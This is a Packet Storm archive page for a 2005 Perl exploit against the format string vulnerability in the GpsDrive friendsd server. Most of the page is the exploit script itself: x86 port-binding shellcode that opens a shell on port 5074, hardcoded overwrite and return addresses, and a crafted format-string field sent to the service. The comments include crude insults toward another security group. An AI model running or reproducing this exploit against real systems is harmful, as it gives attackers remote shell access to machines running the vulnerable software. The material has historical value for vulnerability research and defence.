what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

gpsdrive-ex-short-x86.pl.txt

gpsdrive-ex-short-x86.pl.txt
Posted Nov 5, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

Exploit for the format string vulnerability found in the friendsd server that comes with GpsDrive. x86 version. Binds a shell to port 5074.

tags | exploit, shell, x86
SHA-256 | de673cde91a63e038403a137ba948626e811cb07bebe8fe092b400487c6d5169

gpsdrive-ex-short-x86.pl.txt

Change Mirror Download
#!/usr/bin/perl -w
#
# Code by KF, although it is most likely ripped from John H.
# (kf_lists[at]digital_munition[dot]com)
#
# http://www.digitalmunition.com
#
# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles.
# Free 14 day Testicle licking trial available!
#
# friendsd.c:367: fprintf (stderr, txt);
#
# Tested on intel using gpsdrive_2.09-2_i386.deb
#
# kfinisterre@animosity:~$ telnet localhost 5074
# Trying 127.0.0.1...
# Connected to animosity
# Escape character is '^]'.
# id;
# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre)
# : command not found
#
# s0t4ipv6@Shellcode.com.ar
# x86 portbind a shell in port 5074
# 92 bytes.
#
# This shit is NOT robust and most likely will NOT work on kernel 2.6.12
# because of the random address space. Find your own damn pointers to overwrite
#
$shellcode = "\x90" x 2 .
"\x31\xc0" . # xorl %eax,%eax
"\x50" . # pushl %eax
"\x40" . # incl %eax
"\x89\xc3" . # movl %eax,%ebx
"\x50" . # pushl %eax
"\x40" . # incl %eax
"\x50" . # pushl %eax
"\x89\xe1" . # movl %esp,%ecx
"\xb0\x66" . # movb $0x66,%al
"\xcd\x80" . # int $0x80
"\x31\xd2" . # xorl %edx,%edx
"\x52" . # pushl %edx
"\x66\x68\x13\xd2" . # pushw $0xd213
"\x43" . # incl %ebx
"\x66\x53" . # pushw %bx
"\x89\xe1" . # movl %esp,%ecx
"\x6a\x10" . # pushl $0x10
"\x51" . # pushl %ecx
"\x50" . # pushl %eax
"\x89\xe1" . # movl %esp,%ecx
"\xb0\x66" . # movb $0x66,%al
"\xcd\x80" . # int $0x80
"\x40" . # incl %eax
"\x89\x44\x24\x04" . # movl %eax,0x4(%esp,1)
"\x43" . # incl %ebx
"\x43" . # incl %ebx
"\xb0\x66" . # movb $0x66,%al
"\xcd\x80" . # int $0x80
"\x83\xc4\x0c" . # addl $0xc,%esp
"\x52" . # pushl %edx
"\x52" . # pushl %edx
"\x43" . # incl %ebx
"\xb0\x66" . # movb $0x66,%al
"\xcd\x80" . # int $0x80
"\x93" . # xchgl %eax,%ebx
"\x89\xd1" . # movl %edx,%ecx
"\xb0\x3f" . # movb $0x3f,%al
"\xcd\x80" . # int $0x80
"\x41" . # incl %ecx
"\x80\xf9\x03" . # cmpb $0x3,%cl
"\x75\xf6" . # jnz <shellcode+0x40>
"\x52" . # pushl %edx
"\x68\x6e\x2f\x73\x68" . # pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" . # pushl $0x69622f2f
"\x89\xe3" . # movl %esp,%ebx
"\x52" . # pushl %edx
"\x53" . # pushl %ebx
"\x89\xe1" . # movl %esp,%ecx
"\xb0\x0b" . # movb $0xb,%al
"\xcd\x80"; # int $0x80

use Net::Friends;
use Data::Dumper;

$name = 'GPSDRIVE-aaaa';

# 0804bb84 R_386_JUMP_SLOT recvfrom
$addy = "\x86\xbb\x04\x08"; # This is the write address.
$addy2 = "\x84\xbb\x04\x08";

#$retaddr = 0xbfffba7c; # Retaddr when using gdb
$retaddr = 0xbfffba8a; # Retaddr when NOT using gdb. Its that same kick you in the face styleee from the ppc sploit.

$lo = ($retaddr >> 0) & 0xffff;
$hi = ($retaddr >> 16) & 0xffff;

$hi = $hi - 0x4c;
$lo = (0x10000 + $lo) - $hi - 0x4c;

$hi =1; $lo =1;

$dir = "$addy$addy2%." . $hi . "d%379\$x%." . $lo . "d%380\$x$shellcode";

$friends = Net::Friends->new(shift || 'localhost');
$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir);

print Dumper($friends->query);

# P.S. - I fart in the general direction of Fr-Sirt.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close